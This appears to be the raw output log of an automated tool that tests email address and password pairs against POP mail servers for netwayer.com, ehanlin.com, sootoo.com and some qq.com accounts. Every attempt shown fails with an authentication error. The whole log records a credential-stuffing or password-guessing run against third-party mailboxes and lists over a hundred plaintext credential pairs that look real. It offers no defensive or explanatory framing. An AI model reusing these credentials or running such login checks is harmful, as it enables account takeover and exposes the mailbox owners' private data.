[+] checking 'zhongwm076@netwayer.com' 'wangzd123' 'netwayer.com'
[!] chekcing zhongwm076@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm077@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm077@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm078@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm078@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm079@netwayer.com' 'fengkuangdeyijia' 'netwayer.com'
[!] chekcing zhongwm079@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm080@netwayer.com' 'wangzhidao1178' 'netwayer.com'
[!] chekcing zhongwm080@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm081@netwayer.com' 'wzd2231' 'netwayer.com'
[!] chekcing zhongwm081@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm082@netwayer.com' 'wzd8899' 'netwayer.com'
[!] chekcing zhongwm082@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm083@netwayer.com' 'wzd9981' 'netwayer.com'
[!] chekcing zhongwm083@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm084@netwayer.com' 'wzd1326' 'netwayer.com'
[!] chekcing zhongwm084@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm085@netwayer.com' 'stcm123' 'netwayer.com'
[!] chekcing zhongwm085@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm086@netwayer.com' 'xinshoushanglu' 'netwayer.com'
[!] chekcing zhongwm086@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm087@netwayer.com' 'stcm123' 'netwayer.com'
[!] chekcing zhongwm087@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm088@netwayer.com' 'sootoo123' 'netwayer.com'
[!] chekcing zhongwm088@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm089@netwayer.com' 'wangzhidao999' 'netwayer.com'
[!] chekcing zhongwm089@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm090@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm090@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking '2456988152@qq.com' '123456789' 'pop.qq.com'
[!] chekcing 2456988152@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'zhongwm092@netwayer.com' 'fcq3321' 'netwayer.com'
[!] chekcing zhongwm092@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm093@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm093@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm122@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm122@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm094@netwayer.com' 'wangzhidao333' 'netwayer.com'
[!] chekcing zhongwm094@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking '1958147476@qq.com' 'zhongwm123' 'pop.qq.com'
[!] chekcing 1958147476@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'zhongwm096@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm096@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm097@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm097@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm098@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm098@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm099@netwayer.com' 'sootoo8866' 'netwayer.com'
[!] chekcing zhongwm099@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm100@netwayer.com' 'sootoo3519' 'netwayer.com'
[!] chekcing zhongwm100@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking '1398882609@qq.com' 'sutu123' 'pop.qq.com'
[!] chekcing 1398882609@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'zhongwm002@ehanlin.com' 'weimeiti123' '123.108.216.97'
[!] chekcing zhongwm002@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm003@ehanlin.com' 'wangzhidao123' '123.108.216.97'
[!] chekcing zhongwm003@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm004@ehanlin.com' 'zhongwm123' '123.108.216.97'
[!] chekcing zhongwm004@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm005@ehanlin.com' 'zhongwm8032' '123.108.216.97'
[!] chekcing zhongwm005@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm006@ehanlin.com' 'sootoo6618' '123.108.216.97'
[!] chekcing zhongwm006@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm007@ehanlin.com' 'zhongwm210' '123.108.216.97'
[!] chekcing zhongwm007@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm008@ehanlin.com' 'zhongwm269' '123.108.216.97'
[!] chekcing zhongwm008@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm009@ehanlin.com' 'zhucezhuceba' '123.108.216.97'
[!] chekcing zhongwm009@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm010@ehanlin.com' 'sutu123' '123.108.216.97'
[!] chekcing zhongwm010@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm011@ehanlin.com' 'sutu123' '123.108.216.97'
[!] chekcing zhongwm011@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm012@ehanlin.com' 'wang123' '123.108.216.97'
[!] chekcing zhongwm012@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm013@ehanlin.com' 'wang123' '123.108.216.97'
[!] chekcing zhongwm013@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm014@ehanlin.com' 'wangzd974' '123.108.216.97'
[!] chekcing zhongwm014@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking '2693245591@qq.com' '123123hai' 'pop.qq.com'
[!] chekcing 2693245591@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking 'zhongwm016@ehanlin.com' 'zhongwm226' '123.108.216.97'
[!] chekcing zhongwm016@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm017@ehanlin.com' 'zhongwm008' '123.108.216.97'
[!] chekcing zhongwm017@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm018@ehanlin.com' 'sutu490' '123.108.216.97'
[!] chekcing zhongwm018@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm019@ehanlin.com' 'sootoo789' '123.108.216.97'
[!] chekcing zhongwm019@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm020@ehanlin.com' 'sootoo567' '123.108.216.97'
[!] chekcing zhongwm020@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm021@ehanlin.com' 'wangzd081' '123.108.216.97'
[!] chekcing zhongwm021@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm022@ehanlin.com' 'wangzd992' '123.108.216.97'
[!] chekcing zhongwm022@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm023@ehanlin.com' 'mimayaogouchang' '123.108.216.97'
[!] chekcing zhongwm023@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm024@ehanlin.com' 'sootoo123' '123.108.216.97'
[!] chekcing zhongwm024@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm025@ehanlin.com' 'zhongwm247' '123.108.216.97'
[!] chekcing zhongwm025@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm026@ehanlin.com' 'mimashishenma' '123.108.216.97'
[!] chekcing zhongwm026@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm027@ehanlin.com' 'sootoo265' '123.108.216.97'
[!] chekcing zhongwm027@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm028@ehanlin.com' 'sutu973' '123.108.216.97'
[!] chekcing zhongwm028@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm029@ehanlin.com' 'zhongwm556' '123.108.216.97'
[!] chekcing zhongwm029@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm030@ehanlin.com' 'zhongwm789' '123.108.216.97'
[!] chekcing zhongwm030@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm031@ehanlin.com' 'zhongwm456' '123.108.216.97'
[!] chekcing zhongwm031@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm032@ehanlin.com' 'zhongwm409' '123.108.216.97'
[!] chekcing zhongwm032@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm033@ehanlin.com' 'zhongwm474' '123.108.216.97'
[!] chekcing zhongwm033@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm034@ehanlin.com' 'mima123456' '123.108.216.97'
[!] chekcing zhongwm034@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm035@ehanlin.com' 'mima123456' '123.108.216.97'
[!] chekcing zhongwm035@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm036@ehanlin.com' 'zhongwm168' '123.108.216.97'
[!] chekcing zhongwm036@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm037@ehanlin.com' 'zhongwm210' '123.108.216.97'
[!] chekcing zhongwm037@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm038@ehanlin.com' 'wangzd776' '123.108.216.97'
[!] chekcing zhongwm038@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm039@ehanlin.com' 'sutu625' '123.108.216.97'
[!] chekcing zhongwm039@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm040@ehanlin.com' 'zhongwm9180' '123.108.216.97'
[!] chekcing zhongwm040@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm041@ehanlin.com' 'xuanjing1991' '123.108.216.97'
[!] chekcing zhongwm041@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm042@ehanlin.com' 'mimahaonan' '123.108.216.97'
[!] chekcing zhongwm042@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm043@ehanlin.com' 'mimahaonan' '123.108.216.97'
[!] chekcing zhongwm043@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm044@ehanlin.com' 'zhongwm278' '123.108.216.97'
[!] chekcing zhongwm044@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm045@ehanlin.com' 'zhongwm197' '123.108.216.97'
[!] chekcing zhongwm045@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm046@ehanlin.com' 'sootoo9518' '123.108.216.97'
[!] chekcing zhongwm046@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm047@ehanlin.com' 'zhongwm511' '123.108.216.97'
[!] chekcing zhongwm047@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm048@ehanlin.com' 'zhongwm293' '123.108.216.97'
[!] chekcing zhongwm048@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm049@ehanlin.com' 'zhongwm467' '123.108.216.97'
[!] chekcing zhongwm049@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm050@ehanlin.com' 'zhongwm476' '123.108.216.97'
[!] chekcing zhongwm050@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm051@ehanlin.com' 'zhongwm036' '123.108.216.97'
[!] chekcing zhongwm051@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm052@ehanlin.com' 'zhongwm041' '123.108.216.97'
[!] chekcing zhongwm052@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm053@ehanlin.com' 'zhongwm072' '123.108.216.97'
[!] chekcing zhongwm053@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm054@ehanlin.com' 'zhongwm756' '123.108.216.97'
[!] chekcing zhongwm054@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm055@ehanlin.com' 'zhongwm293' '123.108.216.97'
[!] chekcing zhongwm055@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm056@ehanlin.com' 'wangzhidao002' '123.108.216.97'
[!] chekcing zhongwm056@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm057@ehanlin.com' 'abcabc000' '123.108.216.97'
[!] chekcing zhongwm057@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm058@ehanlin.com' 'abcabc' '123.108.216.97'
[!] chekcing zhongwm058@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm059@ehanlin.com' '12345678' '123.108.216.97'
[!] chekcing zhongwm059@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm060@ehanlin.com' 'xuan1234567' '123.108.216.97'
[!] chekcing zhongwm060@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm065@ehanlin.com' 'zhongwm253' '123.108.216.97'
[!] chekcing zhongwm065@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking '2232209742@qq.com' 'jiuhaoshiwo' 'pop.qq.com'
[!] chekcing 2232209742@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'zhongwm067@ehanlin.com' 'sootoo1597' '123.108.216.97'
[!] chekcing zhongwm067@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm068@ehanlin.com' 'zhongwm278' '123.108.216.97'
[!] chekcing zhongwm068@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm069@ehanlin.com' 'sutu922' '123.108.216.97'
[!] chekcing zhongwm069@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm070@ehanlin.com' 'zhongwm498' '123.108.216.97'
[!] chekcing zhongwm070@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm071@ehanlin.com' 'zhongwm821' '123.108.216.97'
[!] chekcing zhongwm071@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm072@ehanlin.com' 'zhongwm212' '123.108.216.97'
[!] chekcing zhongwm072@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm073@ehanlin.com' 'zhongwm192' '123.108.216.97'
[!] chekcing zhongwm073@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm074@ehanlin.com' 'stcm789' '123.108.216.97'
[!] chekcing zhongwm074@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm075@ehanlin.com' 'stcm778' '123.108.216.97'
[!] chekcing zhongwm075@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm076@ehanlin.com' 'zhongwm889' '123.108.216.97'
[!] chekcing zhongwm076@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm077@ehanlin.com' 'zhongwm746' '123.108.216.97'
[!] chekcing zhongwm077@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm078@ehanlin.com' 'zhongwm610' '123.108.216.97'
[!] chekcing zhongwm078@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm079@ehanlin.com' 'zhongwm710' '123.108.216.97'
[!] chekcing zhongwm079@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm080@ehanlin.com' 'zhongwm020' '123.108.216.97'
[!] chekcing zhongwm080@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm081@ehanlin.com' 'zhongwm021' '123.108.216.97'
[!] chekcing zhongwm081@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm082@ehanlin.com' 'xuan12345' '123.108.216.97'
[!] chekcing zhongwm082@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm083@ehanlin.com' 'xuan12345' '123.108.216.97'
[!] chekcing zhongwm083@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm084@ehanlin.com' 'wangdzx789' '123.108.216.97'
[!] chekcing zhongwm084@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking '2890142370@qq.com' 'sutu123' 'pop.qq.com'
[!] chekcing 2890142370@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'zhongwm086@ehanlin.com' 'weimeiti123' '123.108.216.97'
[!] chekcing zhongwm086@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm087@ehanlin.com' 'wangzd618' '123.108.216.97'
[!] chekcing zhongwm087@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm088@ehanlin.com' 'zhengzhou123' '123.108.216.97'
[!] chekcing zhongwm088@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm089@ehanlin.com' 'zhengzhou123' '123.108.216.97'
[!] chekcing zhongwm089@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm090@ehanlin.com' 'sutu123' '123.108.216.97'
[!] chekcing zhongwm090@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm091@ehanlin.com' 'zhongwm4321' '123.108.216.97'
[!] chekcing zhongwm091@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm092@ehanlin.com' 'xuan12345' '123.108.216.97'
[!] chekcing zhongwm092@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm093@ehanlin.com' 'xuan12345' '123.108.216.97'
[!] chekcing zhongwm093@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm094@ehanlin.com' 'xuan12345' '123.108.216.97'
[!] chekcing zhongwm094@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm095@ehanlin.com' 'xuan12345' '123.108.216.97'
[!] chekcing zhongwm095@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm096@ehanlin.com' 'wangzd262' '123.108.216.97'
[!] chekcing zhongwm096@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm097@ehanlin.com' 'wangzd146' '123.108.216.97'
[!] chekcing zhongwm097@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm098@ehanlin.com' 'zhongwm278' '123.108.216.97'
[!] chekcing zhongwm098@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm099@ehanlin.com' 'mimahaonan' '123.108.216.97'
[!] chekcing zhongwm099@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm001@sootoo.com' 'zhongwm290' 'mail.sootoo.com'
[!] chekcing zhongwm001@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm002@sootoo.com' 'zhongwm908' 'mail.sootoo.com'
[!] chekcing zhongwm002@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm003@sootoo.com' 'zhongwm210' 'mail.sootoo.com'
[!] chekcing zhongwm003@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm004@sootoo.com' 'xuan12345' 'mail.sootoo.com'
[!] chekcing zhongwm004@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm005@sootoo.com' 'xuan12345' 'mail.sootoo.com'
[!] chekcing zhongwm005@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm006@sootoo.com' 'zhongwm174' 'mail.sootoo.com'
[!] chekcing zhongwm006@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm007@sootoo.com' 'zhongwm135' 'mail.sootoo.com'
[!] chekcing zhongwm007@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm008@sootoo.com' 'mimanihaoa' 'mail.sootoo.com'
[!] chekcing zhongwm008@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm009@sootoo.com' 'zhongwm1729' 'mail.sootoo.com'
[!] chekcing zhongwm009@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm010@sootoo.com' 'wangzd171' 'mail.sootoo.com'
[!] chekcing zhongwm010@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm011@sootoo.com' 'wangzd237' 'mail.sootoo.com'
[!] chekcing zhongwm011@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm012@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm012@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm013@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm013@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm014@sootoo.com' '123456a' 'mail.sootoo.com'
[!] chekcing zhongwm014@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm015@sootoo.com' '123456a' 'mail.sootoo.com'
[!] chekcing zhongwm015@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm016@sootoo.com' 'zhongwm035' 'mail.sootoo.com'
[!] chekcing zhongwm016@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm017@sootoo.com' 'zhongwm0236' 'mail.sootoo.com'
[!] chekcing zhongwm017@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm018@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm018@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm019@sootoo.com' 'wangdzx385' 'mail.sootoo.com'
[!] chekcing zhongwm019@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm020@sootoo.com' 'wangdzx940' 'mail.sootoo.com'
[!] chekcing zhongwm020@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm021@sootoo.com' 'wangdzx223' 'mail.sootoo.com'
[!] chekcing zhongwm021@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm022@sootoo.com' 'wangdao998' 'mail.sootoo.com'
[!] chekcing zhongwm022@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm023@sootoo.com' 'wangdao666' 'mail.sootoo.com'
[!] chekcing zhongwm023@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm024@sootoo.com' 'wangzd045' 'mail.sootoo.com'
[!] chekcing zhongwm024@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm025@sootoo.com' 'wangzd046' 'mail.sootoo.com'
[!] chekcing zhongwm025@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm026@sootoo.com' 'zhongwm123' 'mail.sootoo.com'
[!] chekcing zhongwm026@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm027@sootoo.com' 'zhongwm123' 'mail.sootoo.com'
[!] chekcing zhongwm027@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm028@sootoo.com' 'xuan12345' 'mail.sootoo.com'
[!] chekcing zhongwm028@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm029@sootoo.com' 'xuan12345' 'mail.sootoo.com'
[!] chekcing zhongwm029@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm030@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm030@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm031@sootoo.com' 'wangzd888' 'mail.sootoo.com'
[!] chekcing zhongwm031@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm032@sootoo.com' 'zhongwm889' 'mail.sootoo.com'
[!] chekcing zhongwm032@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm033@sootoo.com' 'weixinquna' 'mail.sootoo.com'
[!] chekcing zhongwm033@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm034@sootoo.com' 'wangzd789' 'mail.sootoo.com'
[!] chekcing zhongwm034@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm035@sootoo.com' 'wangzd789' 'mail.sootoo.com'
[!] chekcing zhongwm035@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm036@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm036@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm037@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm037@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm038@sootoo.com' 'zhongwm239' 'mail.sootoo.com'
[!] chekcing zhongwm038@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm039@sootoo.com' 'wang058' 'mail.sootoo.com'
[!] chekcing zhongwm039@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm040@sootoo.com' 'zhongwm812' 'mail.sootoo.com'
[!] chekcing zhongwm040@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm041@sootoo.com' 'zhongwm761' 'mail.sootoo.com'
[!] chekcing zhongwm041@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm042@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm042@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm043@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm043@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm044@sootoo.com' 'zhongwm889' 'mail.sootoo.com'
[!] chekcing zhongwm044@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm045@sootoo.com' 'wangzd889' 'mail.sootoo.com'
[!] chekcing zhongwm045@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm046@sootoo.com' 'mimamima123' 'mail.sootoo.com'
[!] chekcing zhongwm046@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm047@sootoo.com' 'mimamima456' 'mail.sootoo.com'
[!] chekcing zhongwm047@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm048@sootoo.com' 'zhongwm338' 'mail.sootoo.com'
[!] chekcing zhongwm048@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm049@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm049@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm050@sootoo.com' 'wang064' 'mail.sootoo.com'
[!] chekcing zhongwm050@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm051@sootoo.com' 'wang065' 'mail.sootoo.com'
[!] chekcing zhongwm051@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm052@sootoo.com' 'zhongwm062' 'mail.sootoo.com'
[!] chekcing zhongwm052@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm053@sootoo.com' 'zhongwm063' 'mail.sootoo.com'
[!] chekcing zhongwm053@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm054@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm054@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm055@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm055@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm056@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm056@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm057@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm057@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm058@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm058@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm059@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm059@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm060@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm060@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm061@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm061@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm062@sootoo.com' 'mima9876543' 'mail.sootoo.com'
[!] chekcing zhongwm062@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm063@sootoo.com' 'mima1234567' 'mail.sootoo.com'
[!] chekcing zhongwm063@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm064@sootoo.com' 'zhongwm083' 'mail.sootoo.com'
[!] chekcing zhongwm064@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm065@sootoo.com' 'zhongwm084' 'mail.sootoo.com'
[!] chekcing zhongwm065@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm066@sootoo.com' 'zhongwm085' 'mail.sootoo.com'
[!] chekcing zhongwm066@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm067@sootoo.com' 'zhongwm080' 'mail.sootoo.com'
[!] chekcing zhongwm067@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm068@sootoo.com' 'zhongwm081' 'mail.sootoo.com'
[!] chekcing zhongwm068@sootoo.com failed, reason:-ERR Unable to log on
